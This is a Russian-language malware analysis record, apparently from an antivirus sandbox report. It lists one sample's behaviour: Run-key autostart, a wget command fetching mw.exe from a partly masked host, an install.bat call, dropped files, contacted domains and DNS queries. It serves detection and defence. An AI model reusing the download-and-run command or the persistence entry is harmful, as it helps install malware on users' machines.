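Техническая информация
Примечание: символы # в именах узлов, IP-адресе и URL ниже — маска, скрывающая часть значения; при поиске по журналам такие индикаторы годятся только как частичные шаблоны.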
- Автозапуск через ключ реестра Run текущего пользователя: [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'DevidAgent' = '%TEMP%\1.tmp\devid.exe /autorun'
- Загрузка файла по HTTP с помощью wget.exe и сохранение его как %TEMP%\mw.exe: %TEMP%\1.tmp\wget.exe "http://lo###.hopto.org/mw.exe" --output-document="%TEMP%\mw.exe"
- %TEMP%\mw.exe
- %TEMP%\1.tmp\devid.exe
- %TEMP%\1.tmp\wa.exe /s
- %TEMP%\mw.exe (загружен из сети Интернет)
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\install.bat" "
- %TEMP%\1.tmp\devid.exe
- %TEMP%\mw.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\install.bat
- %TEMP%\1.tmp\wa.exe
- %TEMP%\1.tmp\devid.exe
- %TEMP%\1.tmp\install.bat
- %TEMP%\1.tmp\wa.exe
- %TEMP%\1.tmp\wget.exe
- 'in####l.ticno.com':80
- 'de##d.info':80
- 'lo###.hopto.org':80
- '74.##5.232.51':80
- in####l.ticno.com/10/?wm############################################################
- in####l.ticno.com/feed/feed_en.xml
- lo###.hopto.org/mw.exe
- de##d.info/xmlsearch/checkcompatibility
- DNS ASK in####l.ticno.com
- DNS ASK de##d.info
- DNS ASK lo###.hopto.org
- DNS ASK google.com
- ClassName: 'Indicator' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''